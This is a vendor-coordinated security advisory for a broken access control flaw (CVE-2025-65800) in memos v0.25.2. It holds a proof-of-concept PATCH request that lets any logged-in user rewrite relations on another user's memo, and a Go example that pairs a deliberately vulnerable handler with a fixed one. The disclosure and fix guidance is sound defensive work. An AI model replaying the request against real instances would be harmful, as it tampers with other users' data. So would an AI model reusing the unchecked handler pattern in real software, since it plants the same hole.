usd-2025-61 | Broken Access Control in Memo Relations
Product: memos
Affected Version: v0.25.2
Vulnerability Type: CWE-862: Missing Authorization
Security Risk: Low
Vendor: usememos
Vendor URL: https://github.com/usememos/memos
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2025-65800
CVE Link: https://www.cve.org/CVERecord?id=CVE-2025-65800
Advisory ID: usd-2025-61
Description
Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth/SSO integration, activity logging, and internationalization.
An authenticated, low-privileged attacker can set and delete arbitrary relations between Memos.
Proof of Concept
The following HTTP request can be used by low-privileged users to modify the relations between Memos.
PATCH /api/v1/memos/QeytDXhHc6MYLXWhMjFDST/relations HTTP/1.1
Host: memos:5230
Content-Type: application/json
Cookie: user_session=3-3a[... REDACTED ...]79
Content-Length: 175

{
  "name": "memos/QeytDXhHc6MYLXWhMjFDST",
  "relations": [
    {
      "memo": { "name": "memos/QeytDXhHc6MYLXWhMjFDST" },
      "relatedMemo": { "name": "memos/ff6FyXzix9d8QyUQGvig3Q" },
      "type": "REFERENCE"
    }
  ]
}
In the above example, Memo QeytDXhHc6MYLXWhMjFDST is updated and a reference to ff6FyXzix9d8QyUQGvig3Q is added. The ownership of the modified Memo is not verified.
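The missing check, shown as an added Go example that is not the memos project's own code: the types, the in-memory store and the two handler variants are hypothetical stand-ins for the backend's memo storage. The vulnerable variant looks the memo up and replaces its relation list for any authenticated caller; the fixed variant compares the memo's stored creator with the authenticated caller before modifying anything, and (since the list is replaced as a whole) the same check also covers deletion via an empty list.

```go
package main

import (
	"errors"
	"fmt"
)

// Hypothetical types standing in for the backend's memo storage; they are not
// the memos project's own code and are simplified for illustration.
type Relation struct {
	RelatedMemo string // resource name of the target memo, e.g. "memos/ff6F..."
	Type        string // e.g. "REFERENCE"
}

type Memo struct {
	Name      string // resource name, e.g. "memos/QeytDXhHc6MYLXWhMjFDST"
	CreatorID int    // user ID of the memo's owner
	Relations []Relation
}

var (
	ErrNotFound         = errors.New("memo not found")
	ErrPermissionDenied = errors.New("permission denied: caller does not own this memo")
)

// Store is an in-memory stand-in for the database.
type Store struct {
	memos map[string]*Memo
}

func NewStore(memos ...*Memo) *Store {
	s := &Store{memos: make(map[string]*Memo)}
	for _, m := range memos {
		s.memos[m.Name] = m
	}
	return s
}

// SetRelationsVulnerable reproduces the defect class described in the advisory
// (CWE-862): the caller is authenticated, but nothing checks whether the caller
// owns the memo, so any logged-in user can rewrite any memo's relations.
// Because the whole list is replaced, passing an empty list deletes relations.
func (s *Store) SetRelationsVulnerable(memoName string, rels []Relation) error {
	m, ok := s.memos[memoName]
	if !ok {
		return ErrNotFound
	}
	m.Relations = append([]Relation(nil), rels...)
	return nil
}

// SetRelationsFixed adds the missing authorization step: the memo's stored
// creator must match the authenticated caller before anything is modified.
// The decision is made from server-side data, never from a field in the
// request body.
func (s *Store) SetRelationsFixed(callerID int, memoName string, rels []Relation) error {
	m, ok := s.memos[memoName]
	if !ok {
		return ErrNotFound
	}
	if m.CreatorID != callerID {
		return ErrPermissionDenied
	}
	m.Relations = append([]Relation(nil), rels...)
	return nil
}

// RelationCount returns how many relations a memo currently has (-1 if absent).
func (s *Store) RelationCount(memoName string) int {
	if m, ok := s.memos[memoName]; ok {
		return len(m.Relations)
	}
	return -1
}

func main() {
	// Constructed sample data: user 1 owns memo A, user 2 owns memo B.
	s := NewStore(
		&Memo{Name: "memos/A", CreatorID: 1},
		&Memo{Name: "memos/B", CreatorID: 2},
	)
	rels := []Relation{{RelatedMemo: "memos/A", Type: "REFERENCE"}}

	// User 1 rewriting user 2's memo: accepted by the vulnerable path ...
	fmt.Println("vulnerable:", s.SetRelationsVulnerable("memos/B", rels))
	// ... and rejected once the ownership check is in place.
	fmt.Println("fixed, wrong owner:", s.SetRelationsFixed(1, "memos/B", rels))
	fmt.Println("fixed, owner:", s.SetRelationsFixed(2, "memos/B", rels))
}
```

The important property is that the ownership comparison happens before any write, so a rejected request leaves the stored relations untouched; a unit test that asserts on the relation count after a denied call is a cheap regression guard for this kind of missing-authorization bug.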
Fix
Fixes for all mentioned vulnerabilities have been submitted as a pull request.
References
Timeline
- 2025-11-03: First contact request
- 2025-11-04: Pull request submitted
- 2025-11-06: Commit merged to main by vendor
- 2025-11-25: Version 0.25.3 was released
- 2025-12-03: This advisory is published
Credits
This security vulnerability was identified by Florian Dewald of usd AG.